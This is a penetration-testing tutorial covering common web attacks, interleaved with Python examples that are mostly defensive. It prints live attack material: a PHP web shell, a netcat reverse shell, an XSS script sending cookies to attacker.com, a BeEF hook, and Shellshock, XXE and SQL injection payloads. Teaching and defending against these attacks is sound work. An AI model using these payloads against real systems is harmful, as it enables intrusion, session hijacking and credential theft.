Web Penetration Testing Techniques and Exploits

File Inclusion and Upload Vulnerabilities

File inclusion vulnerabilities occur when a web application builds the path of a file it includes from user input without proper validation, letting an attacker include files the developer never intended. Remote File Inclusion (RFI) pulls the file from an attacker-controlled URL; Local File Inclusion (LFI) is limited to files already on the server. PHP, for example, has shipped with allow_url_include disabled since version 5.2.0, which is why LFI is now far more common than RFI.

A practical exploitation technique chains a file upload with an LFI vulnerability. PHP's include() executes whatever PHP code the included file contains, regardless of its extension, so a shell smuggled in as an image runs as soon as it is included. On a server where uploads land in a known directory (e.g., ../../hackable/uploads/ relative to the vulnerable script), an attacker can:

  1. Upload a PHP web shell disguised as a JPG file (e.g., webshell.jpg) to get past an extension-based upload filter.
  2. Use the LFI vulnerability to include a second uploaded file (rename.jpg) whose PHP code renames webshell.jpg to webshell.php.
  3. Execute the web shell, either by requesting webshell.php directly now that it has a .php extension or through the LFI, to run arbitrary commands on the server.

Example web shell code (webshell.php):

<?php
    // Deliberately minimal: runs whatever arrives in ?cmd= with the web server's
    // privileges and echoes the output, e.g. webshell.php?cmd=id
    system($_GET['cmd']);
?>
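The chain above works because include() trusts the user-supplied path. The following Python model is an added example, not code from the original article: it shows the server-side containment check that breaks the chain (normalise the path, pin it under an include root, allowlist the extension) next to the naive blacklist many applications use instead, which a doubled-up traversal defeats. The include root /var/www/html/pages is an assumption, and nothing on the filesystem is touched.

```python
import os
from typing import Optional

# Assumed include root for this example (hypothetical path, not from the article).
ALLOWED_PAGES_DIR = "/var/www/html/pages"


def naive_filter(user_path: str) -> str:
    """The blacklist approach seen in many LFI-vulnerable apps: strip '../' once.
    It is bypassed by '....//', which collapses back into '../' after the strip."""
    return user_path.replace("../", "")


def resolve_include(user_path: str, base: str = ALLOWED_PAGES_DIR) -> Optional[str]:
    """Return the absolute file to include, or None if the request escapes `base`.

    normpath collapses '.' and '..' segments without consulting the filesystem, so
    this runs offline; on a live host use os.path.realpath so symlinks are also
    resolved before the containment check.
    """
    candidate = os.path.normpath(os.path.join(base, user_path))
    # Containment check: the resolved path must still live under the include root.
    # commonpath compares whole components, so /var/www/html/pages2 does not pass.
    if os.path.commonpath([base, candidate]) != base:
        return None
    # Allowlist the extension too, so uploaded images or log files cannot be included.
    if not candidate.endswith(".php"):
        return None
    return candidate
```

resolve_include() rejects `../../hackable/uploads/webshell.jpg` twice over: it leaves the include root and it is not a .php file. naive_filter(), by contrast, turns `....//....//etc/passwd` into the very `../../etc/passwd` it was meant to remove.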

OS Command Injection

Command injection vulnerabilities arise when user input is passed, unsanitized, into an operating-system command. A typical example is a PHP ping utility that calls shell_exec() with a user-supplied address appended to the command string: the shell that runs the command also interprets any metacharacters the user included.

Exploitation steps:

  1. Identify a vulnerable parameter (e.g., the address field of a ping utility).
  2. Inject a second command after a shell separator such as ; , && or | (e.g., 192.168.56.1; uname -a) and confirm its output appears in the response.
  3. Escalate to a reverse shell: start a listener on the attacking host and inject a command that connects back to it, e.g. with Netcat.

Example reverse shell command (the attacker is listening with nc -lvnp 12345 on 192.168.56.1):

nc -e /bin/bash 192.168.56.1 12345

The -e option exists only in netcat builds that support command execution (nc.traditional, ncat); the OpenBSD netcat shipped by many distributions omits it, in which case a bash /dev/tcp or mkfifo-based reverse shell is used instead.
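To make the failure mode concrete, here is an added Python example (not from the article) of the three ways the ping handler can be written: the vulnerable pattern described above, a shell-quoted variant, and the argv-list version that validates the address first. echo stands in for ping so the code runs anywhere with a POSIX shell and never sends packets; the injected command only prints a marker.

```python
import ipaddress
import shlex
import subprocess


def ping_vulnerable(host: str) -> str:
    """Same shape as shell_exec('ping -c 1 ' . $_GET['ip']): user input is spliced
    into a command line that a shell then parses. `echo` stands in for `ping`
    so the demo runs offline."""
    return subprocess.run("echo pinging " + host, shell=True,
                          capture_output=True, text=True).stdout


def ping_quoted(host: str) -> str:
    """Still uses a shell, but shlex.quote turns the whole input into one literal
    argument, so separators like ';' and '|' lose their meaning."""
    return subprocess.run("echo pinging " + shlex.quote(host), shell=True,
                          capture_output=True, text=True).stdout


def ping_safe(host: str) -> str:
    """Preferred fix: validate the input against what it is supposed to be, then
    pass an argv list so no shell is involved at all. Raises ValueError for
    anything that is not a bare IPv4/IPv6 address (hostnames would need their
    own strict allowlist)."""
    ipaddress.ip_address(host)
    return subprocess.run(["echo", "pinging", host],
                          capture_output=True, text=True).stdout


# Constructed attacker input: the page's separator trick with a harmless payload.
INJECTED = "192.168.56.1; echo INJECTED"
```

ping_vulnerable(INJECTED) prints two lines, the second being the attacker's; ping_quoted() prints the whole input as one literal line; ping_safe() refuses it before anything runs.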

XML External Entity (XXE) Injection

XXE vulnerabilities occur when an XML parser processes untrusted input with external entity resolution enabled. The attacker declares an entity in an inline DTD whose value is fetched from a URI, and the parser substitutes the fetched content wherever the entity is referenced.

Exploitation example:

<?xml version="1.0"?>
<!DOCTYPE test [
    <!ENTITY fileEntity SYSTEM "file:///etc/passwd">
]>
<data>&fileEntity;</data>

This payload returns the contents of /etc/passwd in place of &fileEntity;. Because the URI can also be http://, XXE doubles as Server-Side Request Forgery (SSRF) against internal hosts, and on PHP it escalates to command execution only if the expect extension (the expect:// wrapper) is installed, which is rare. The fix is to disable DTD processing, or at least external entity resolution, in the parser.
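The most robust defence, when the application never needs DTDs, is to refuse any document that carries one rather than depend on parser flags. The Python below is an added example, not code from the article: it decodes according to the byte-order mark first (so a UTF-16 payload cannot slip past an ASCII check), rejects anything with a DOCTYPE or ENTITY declaration, and only then hands the document to the standard-library parser. The SSRF URL 10.0.0.5:8080/admin is a made-up internal address.

```python
import codecs
import re
import xml.etree.ElementTree as ET

# Any DTD at all is rejected; this also shuts the door on billion-laughs expansion.
DTD_MARKER = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

_BOMS = (
    (codecs.BOM_UTF16_LE, "utf-16-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"),
    (codecs.BOM_UTF8, "utf-8"),
)


def _to_text(data: bytes) -> str:
    """Decode by BOM so the marker check sees the same text the parser will.
    Undecodable bytes are replaced rather than rejected."""
    for bom, enc in _BOMS:
        if data.startswith(bom):
            return data[len(bom):].decode(enc, errors="replace")
    return data.decode("utf-8", errors="replace")


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Refuse documents that declare a DTD or entities, then parse normally."""
    if DTD_MARKER.search(_to_text(data)):
        raise ValueError("DTD or entity declaration in untrusted XML")
    return ET.fromstring(data)


# Constructed payloads: the page's file-read payload, an SSRF variant (hypothetical
# internal URL), the expect:// command-execution variant, and a UTF-16 re-encoding.
XXE_PAYLOADS = {
    "file": b'<?xml version="1.0"?><!DOCTYPE test [<!ENTITY fileEntity SYSTEM "file:///etc/passwd">]><data>&fileEntity;</data>',
    "ssrf": b'<?xml version="1.0"?><!DOCTYPE test [<!ENTITY e SYSTEM "http://10.0.0.5:8080/admin">]><data>&e;</data>',
    "expect": b'<?xml version="1.0"?><!DOCTYPE test [<!ENTITY e SYSTEM "expect://id">]><data>&e;</data>',
    "utf16": '<?xml version="1.0"?><!DOCTYPE test [<!ENTITY e SYSTEM "file:///etc/passwd">]><data>&e;</data>'.encode("utf-16"),
}


def rejected(name: str) -> bool:
    """True if parse_untrusted_xml refuses the named payload."""
    try:
        parse_untrusted_xml(XXE_PAYLOADS[name])
    except ValueError:
        return True
    return False
```

The check is deliberately coarse: a document that merely mentions "<!DOCTYPE" inside a CDATA section is rejected too. For an API that receives machine-generated XML that is an acceptable false positive.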

Password Brute-Forcing with Hydra

Hydra is a network login cracker that supports brute-forcing many protocols. For web applications its http-form-post module submits POST requests to a login form and judges success from the response.

Example command to brute-force a login form:

hydra -L users.txt -P passwords.txt -t 2 192.168.56.102 http-form-post "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"

The module argument has three colon-separated fields: the login path, the POST body with ^USER^ and ^PASS^ as placeholders, and a string that appears only in failed responses (Hydra treats any response lacking it as a hit). -L and -P supply the username and password lists, and -t 2 limits Hydra to two parallel tasks, which reduces the chance of triggering account lockouts.

Dictionary Attacks with Burp Suite Intruder

Burp Suite's Intruder tool can automate attacks on web parameters, such as login forms, by fuzzing with payloads.

Steps:

  1. Capture a login request with Burp Proxy.
  2. Send it to Intruder and mark the username and password values as payload positions.
  3. Choose the Cluster bomb attack type and assign a wordlist to each position, so every username is tried with every password.
  4. Launch the attack and sort the results by response length or status code; a successful login usually produces a response that differs in length or redirects.
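What Hydra and Intruder do in the two sections above, written out in Python so the success criteria are visible. This is an added example, not code from the article or either tool: it starts a constructed mock of /login.php on a loopback port (one valid credential pair, HTTP 200 either way, only the body differs), runs a cluster-bomb dictionary attack against it, flags hits by the absence of the failure string exactly as Hydra's http-form-post does, and records the response lengths that Intruder's results table is sorted on.

```python
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the target: the one credential pair the form accepts.
VALID_CREDENTIALS = {"admin": "Summer2024"}
FAILURE_STRING = b"Invalid credentials"   # the marker Hydra is told to look for


class LoginHandler(BaseHTTPRequestHandler):
    """Minimal /login.php: HTTP 200 either way, only the body differs."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("user", [""])[0]
        pwd = form.get("pass", [""])[0]
        if VALID_CREDENTIALS.get(user) == pwd:
            body = (b"<html><body>Welcome back, " + user.encode()
                    + b'! <a href="/logout">Log out</a></body></html>')
        else:
            body = b"<html><body>" + FAILURE_STRING + b"</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_server() -> HTTPServer:
    """Bind to an ephemeral loopback port and serve in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def try_login(url: str, user: str, pwd: str) -> bytes:
    """One form submission; urlopen with data= sends an x-www-form-urlencoded POST."""
    data = urllib.parse.urlencode({"user": user, "pass": pwd}).encode()
    with urllib.request.urlopen(url, data=data, timeout=5) as resp:
        return resp.read()


def dictionary_attack(url, users, passwords, failure=FAILURE_STRING):
    """Cluster-bomb every user with every password.

    Success is judged the way Hydra's http-form-post does it: a response that
    does not contain the failure string is a hit. Response lengths are recorded
    too, which is the column one sorts on in Burp Intruder's results."""
    hits, lengths = [], {}
    for user in users:
        for pwd in passwords:
            body = try_login(url, user, pwd)
            lengths[(user, pwd)] = len(body)
            if failure not in body:
                hits.append((user, pwd))
    return hits, lengths


def run_demo():
    """Spin up the mock target, run the attack against it, and tear it down."""
    srv = start_server()
    url = f"http://127.0.0.1:{srv.server_address[1]}/login.php"
    try:
        return dictionary_attack(url, ["root", "admin"],
                                 ["123456", "password", "Summer2024"])
    finally:
        srv.shutdown()
        srv.server_close()
```

Against a real target the same loop needs the throttling Hydra's -t flag provides, and the failure-string check should be combined with the length and status-code signals, since some applications return the error text on success pages too.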

Stealing Session Cookies via XSS

Cross-Site Scripting (XSS) can be leveraged to steal session cookies, enabling session hijacking: a script injected into the vulnerable page runs in the victim's origin and can read document.cookie, provided the cookie was set without the HttpOnly flag.

Example malicious script:

<script>
    // Exfiltrate the victim's cookies to the attacker's collector (attacker.com is a placeholder).
    // encodeURIComponent keeps the '=' and ';' in the cookie string from breaking the query string.
    var req = new XMLHttpRequest();
    req.open('GET', 'http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie), true);
    req.send();
</script>

When executed in a victim's browser, this sends their session cookies to an attacker-controlled server, which only has to log the query string. Cookies flagged HttpOnly are invisible to document.cookie, so the request arrives empty; the attacker then has to act through the victim's browser instead, which is what BeEF (below) is for.
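Whether the payload above yields anything is decided by the Set-Cookie header the application sends, so the check a tester wants is an audit of that header. The Python below is an added example, not code from the article: it parses Set-Cookie values and reports the missing flags, with HttpOnly being the one that blanks out document.cookie. The three sample headers are constructed.

```python
from typing import List, Tuple


def audit_set_cookie(header: str) -> Tuple[str, List[str]]:
    """Parse one Set-Cookie header value and report the hardening flags it lacks.

    HttpOnly is the flag that defeats a cookie-stealing XSS payload: the browser
    still sends the cookie, but document.cookie no longer reveals it to scripts."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()

    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie from any XSS")
    if "secure" not in attrs:
        findings.append("missing Secure: sent in clear over http://")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite is not Lax or Strict: cookie rides along on cross-site requests")
    return name, findings


# Constructed sample headers, as a server might emit them.
SAMPLE_HEADERS = [
    "PHPSESSID=8f3c1d2e4b5a6978; path=/",
    "JSESSIONID=A1B2C3D4E5F6; Path=/; HttpOnly",
    "session=eyJ1c2VyIjoiYm9iIn0; Path=/; Secure; HttpOnly; SameSite=Strict",
]


def audit_all(headers=SAMPLE_HEADERS):
    """Map cookie name -> list of findings for a batch of Set-Cookie headers."""
    return dict(audit_set_cookie(h) for h in headers)
```

Attribute names are matched case-insensitively, as browsers do, so `path=/` and `Path=/` are treated alike.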

SQL Injection Exploitation

SQL injection allows attackers to execute arbitrary SQL queries. Steps for exploitation include:

  1. Determining the number of columns in the original query by appending ORDER BY n for increasing n until the database returns an error.
  2. Extracting data via UNION queries whose SELECT list has exactly that many columns.
  3. Retrieving database information (e.g., version and current user, then table contents such as password hashes).

Example union-based injection (MySQL syntax; MySQL only treats -- as a comment when a space follows it, so append a space or use # instead):

' UNION SELECT @@version, user() --

Automated SQL Injection with SQLMap

SQLMap automates SQL injection detection and exploitation.

Example command to enumerate the databases reachable through an injectable parameter:

sqlmap -u "http://target.com/page?id=1" --cookie="session=value" --data="param=value" --dbs

--cookie passes a valid session so authenticated pages can be tested, --data switches the request to POST with the given body (parameters in both the URL and the body are tested), and --dbs lists the databases. Follow-up options such as --tables, --dump, --os-shell and --sql-shell dump table contents, execute operating-system commands where the database user's privileges allow it, or open an interactive SQL prompt.

Exploiting Tomcat with Metasploit

Apache Tomcat's manager application (/manager/html) is protected only by HTTP Basic authentication, and installations are often left with default or weak credentials. Metasploit's tomcat_mgr_login module brute-forces that login, using its bundled list of well-known Tomcat default credentials unless USER_FILE/PASS_FILE are set.

Example Metasploit usage:

use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.56.102
set RPORT 8080
run

Valid manager credentials allow deploying an attacker-supplied WAR file containing a web shell (Metasploit's exploit/multi/http/tomcat_mgr_upload automates this), giving remote command execution as the Tomcat service account.

Advanced Exploitation with BeEF

The Browser Exploitation Framework (BeEF) hooks victim browsers by getting its hook.js loaded into a page they visit, typically through an XSS injection, and then drives client-side attacks from its console.

Example hook script:

<script src="http://attacker:3000/hook.js"></script>

Once hooked, the browser polls the BeEF server (port 3000 by default) for commands; the operator can log keystrokes, steal cookies that are not HttpOnly, fingerprint the browser and its plugins, or launch further exploits against it.

Blind SQL Injection

Blind SQL injection occurs when the application shows neither query results nor error messages, so data has to be inferred one character at a time from side channels: whether the page content changes (boolean-based) or how long the response takes (time-based).

Boolean-based example (the page renders normally only if the first character of the current user is 'a'; the attacker iterates over positions and characters):

' AND (SELECT SUBSTRING(user(),1,1))='a' --

Time-based example (the response is delayed by five seconds only when the injected condition is evaluated):

' AND SLEEP(5) --
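The union-based and blind techniques from the two SQL injection sections above, worked end to end against an in-memory SQLite database. This is an added example, not code from the article: the tables, rows and the md5("password") hash are constructed; SQLite's sqlite_version() and SUBSTR stand in for MySQL's @@version/user() and SUBSTRING; and the time-based variant is omitted because SQLite has no SLEEP(). lookup_safe() shows the parameterised fix beside the vulnerable query.

```python
import sqlite3
import string

PASSWORD_MD5 = "5f4dcc3b5aa765d61d8327deb882cf99"   # md5("password"), constructed data


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the target's database (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', '{PASSWORD_MD5}');
    """)
    return conn


def lookup_vulnerable(conn, product_id: str):
    """The injectable query: the parameter is concatenated into the SQL text."""
    sql = "SELECT name, price FROM products WHERE id = '" + product_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, product_id: str):
    """The fix: a bound parameter is data, never SQL, whatever it contains."""
    return conn.execute("SELECT name, price FROM products WHERE id = ?",
                        (product_id,)).fetchall()


def count_columns(conn, limit: int = 50) -> int:
    """Step 1: ORDER BY n succeeds while n <= column count, then errors."""
    for n in range(1, limit + 1):
        try:
            lookup_vulnerable(conn, f"1' ORDER BY {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("column count exceeds limit")


def union_dump_users(conn):
    """Step 2: a UNION with the same column count pulls rows from another table.
    id = '0' matches nothing, so only the injected SELECT's rows come back."""
    return lookup_vulnerable(
        conn, "0' UNION SELECT username, password_hash FROM users -- ")


def union_version(conn):
    """Step 3: server information; NULL pads the second column."""
    return lookup_vulnerable(conn, "0' UNION SELECT sqlite_version(), NULL -- ")


def blind_extract(conn, expr: str, max_len: int = 32) -> str:
    """Boolean-based blind extraction: the only feedback is whether the product
    row comes back. Recover `expr` one character at a time, as the page's
    SUBSTRING(user(),1,1)='a' probe does."""
    charset = string.ascii_letters + string.digits + "_$"
    result = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = f"1' AND SUBSTR(({expr}), {pos}, 1) = '{ch}' -- "
            if lookup_vulnerable(conn, probe):
                result += ch
                break
        else:
            break   # no character matched: end of the value
    return result
```

The trailing space after `--` in every payload matters in MySQL as well; the comment swallows the closing quote the application appends. Feeding the same union payload to lookup_safe() returns nothing, because the whole string is compared against id as a literal.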

Shellshock Exploitation

Shellshock (CVE-2014-6271) is a Bash vulnerability: when Bash imports an environment variable whose value starts with the function definition () { ... }, it also executes any commands that follow the closing brace. Web servers running CGI scripts are exposed because they copy request headers such as User-Agent into environment variables before invoking the script.

Example payload:

GET /cgi-bin/vulnerable.sh HTTP/1.1
User-Agent: () { :;}; echo; /bin/cat /etc/passwd

The echo; emits the empty line that terminates the CGI response headers, so the output of the following command lands in the HTTP body instead of producing a malformed-header error.
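Because the trigger is a fixed prefix in a request header, Shellshock attempts are easy to find after the fact in web server logs. The Python below is an added example, not code from the article: it parses Apache/nginx "combined" format log lines and flags any whose Referer or User-Agent begins a Bash function definition. The four log lines are constructed; the first carries the page's payload.

```python
import re
from typing import List, Tuple

# "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The trigger for CVE-2014-6271 is a value that begins with the Bash function
# definition '() {'; whatever follows the closing brace is what gets executed.
SHELLSHOCK = re.compile(r"\(\)\s*\{")

# Constructed sample log lines: payload in User-Agent (as on the page), payload
# in Referer, and two lines of ordinary traffic.
SAMPLE_LOG = [
    '192.168.56.1 - - [10/May/2026:12:00:01 +0000] "GET /cgi-bin/vulnerable.sh HTTP/1.1" 200 512 "-" "() { :;}; echo; /bin/cat /etc/passwd"',
    '192.168.56.1 - - [10/May/2026:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.168.56.1 - - [10/May/2026:12:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 128 "() { :; }; /bin/bash -c id" "curl/7.68.0"',
    '10.0.0.7 - - [10/May/2026:12:01:00 +0000] "POST /cgi-bin/form.cgi HTTP/1.1" 500 0 "http://intranet/form" "Wget/1.21"',
]


def find_shellshock(lines) -> List[Tuple[str, str, str]]:
    """Return (client ip, request line, offending header) for each log line whose
    Referer or User-Agent carries the function-definition prefix. Lines that do
    not match the combined format are skipped."""
    hits = []
    for line in lines:
        m = COMBINED_LOG.match(line)
        if not m:
            continue
        for header in ("referer", "agent"):
            if SHELLSHOCK.search(m.group(header)):
                hits.append((m.group("ip"), m.group("request"), header))
    return hits
```

Only Referer and User-Agent are logged in the combined format; payloads placed in Cookie or custom headers need the web server configured to log those headers, or a network sensor in front of it.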

Password Hash Cracking

John the Ripper and Hashcat can crack password hashes obtained from databases.

John the Ripper example (dictionary attack against unsalted MD5 hashes, one per line in hashes.txt):

john --wordlist=rockyou.txt --format=raw-md5 hashes.txt

Hashcat (GPU-accelerated) example, a mask attack that tries every 8-character string of printable ASCII (?a covers 95 characters, so the keyspace is 95^8, about 6.6 x 10^15, which is within reach of GPU hardware for a fast hash like MD5):

hashcat -m 0 -a 3 hashes.txt ?a?a?a?a?a?a?a?a

-m 0 selects raw MD5 and -a 3 the mask attack mode.
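To see why the john command above is so effective against unsalted MD5, here is the same attack in Python, as an added example that is not code from the article or from either tool. It applies a handful of john-style mangling rules to each dictionary word and tests every candidate against all target hashes at once, which is what the lack of a salt permits. The hashes and wordlist are constructed; one hash is deliberately left uncrackable.

```python
import hashlib
from typing import Dict, Iterable, Iterator


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def mangle(word: str) -> Iterator[str]:
    """A few of the rules john/hashcat apply to every dictionary word:
    the word itself, capitalised, and common suffixes on both."""
    for base in (word, word.capitalize()):
        yield base
        for suffix in ("1", "123", "2024", "!"):
            yield base + suffix


def crack_raw_md5(hashes: Iterable[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Dictionary attack on unsalted MD5 (john --format=raw-md5, hashcat -m 0).

    Because there is no salt, one hash computation tests a candidate against
    every target hash simultaneously; with a per-user salt each hash would have
    to be attacked separately, and with a slow hash each guess would cost far more."""
    remaining = {h.lower() for h in hashes}
    cracked: Dict[str, str] = {}
    for word in wordlist:
        for candidate in mangle(word):
            digest = md5_hex(candidate)
            if digest in remaining:
                cracked[digest] = candidate
                remaining.discard(digest)
                if not remaining:
                    return cracked
    return cracked


# Constructed sample: hashes as dumped from a users table. The plaintexts appear
# here only so the reader can see what is recovered.
SAMPLE_HASHES = [
    md5_hex("password"),               # 5f4dcc3b5aa765d61d8327deb882cf99
    md5_hex("Winter2024"),             # "winter" capitalised plus a year suffix
    md5_hex("letmein!"),               # "letmein" plus a "!" suffix
    md5_hex("c0rrect-h0rse-battery"),  # not derivable from the wordlist: stays uncracked
]
SAMPLE_WORDLIST = ["123456", "password", "winter", "letmein", "qwerty"]
```

Three of the four hashes fall to a five-word list with a few rules; the fourth survives only because no rule produces it, which is the whole argument for long, unpredictable passwords and salted, slow hashes on the storage side.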

Cross-Site Request Forgery (CSRF)

CSRF tricks an authenticated user's browser into performing an action the user never intended. The attacker embeds a request to the target site in a page they control; when the victim loads it, the browser sends the request along with the victim's session cookie, so the application accepts it as legitimate.

Example CSRF payload (it works only if the transfer endpoint accepts GET and checks no anti-CSRF token; SameSite=Lax or Strict session cookies also stop it):

<img src="http://bank.com/transfer?to=attacker&amount=1000" />
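The server-side controls that defeat the image payload, written out in Python as an added example that is not code from the article. The transfer handler accepts state changes only over POST and only with a token bound to the caller's session, issued as nonce.HMAC(secret, session_id:nonce) and compared in constant time; a request forged from another origin has neither. The endpoint shape, session identifiers and amounts are assumptions.

```python
import hashlib
import hmac
import secrets
from typing import Mapping

# Per-deployment server secret; generated on import here, loaded from config in practice.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Token bound to the session: nonce.HMAC(secret, session_id:nonce).
    It goes into the form as a hidden field, so a cross-site page cannot read it."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str, secret: bytes = SERVER_SECRET) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_transfer(method: str, session_id: str, form: Mapping[str, str]) -> str:
    """Server side of the /transfer endpoint with two CSRF controls: state changes
    must be POSTed, and must carry a token for this session. The <img> payload
    produces a GET with no token, so it fails both checks."""
    if method != "POST":
        return "rejected: state change via GET"
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return "rejected: missing or invalid CSRF token"
    return f"transferred {form['amount']} to {form['to']}"
```

Binding the token to the session is what stops an attacker from obtaining a valid token with their own account and replaying it in the victim's form.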

Man-in-the-Middle (MITM) Attacks

MITM attacks intercept and modify communication between clients and servers on a local network. Tools like Ettercap and SSLsplit facilitate these attacks.

ARP spoofing with Ettercap (-T selects the text interface, -M arp poisons both targets so their traffic flows through the attacker; the target syntax is MAC/IPs/PORTs in Ettercap 0.7 and MAC/IPs/IPv6/PORTs in 0.8, hence the differing number of slashes in the two Ettercap commands on this page):

ettercap -T -M arp /192.168.56.101// /192.168.56.102//

TLS interception with SSLsplit (it terminates the client's TLS session with a certificate forged on the fly and signed by the CA in key.pem/cert.pem, then opens its own connection to the real server; the client sees a certificate warning unless that CA is trusted):

sslsplit -D -l connections.log -k key.pem -c cert.pem ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

-D runs it in the foreground with debug output and -l logs every connection. Traffic has to be redirected to the listening ports 8443 (TLS) and 8080 (plain TCP), e.g. with iptables REDIRECT rules, once ARP spoofing has put the attacker in the path.

DNS Spoofing

DNS spoofing answers a victim's DNS queries with attacker-chosen IP addresses. Ettercap's dns_spoof plugin does this for the names listed in its etter.dns file.

Example Ettercap command:

ettercap -i eth0 -T -P dns_spoof -M arp /192.168.56.101///

This ARP-poisons the victim on eth0 (the second target is omitted, so all other hosts on the segment are used) and answers its DNS requests for the names configured in etter.dns with the attacker's addresses; queries for other names pass through unchanged.

Tags: Web Security Penetration Testing Exploitation Vulnerabilities SQL Injection

Posted on Sun, 10 May 2026 12:39:31 +0000 by dark dude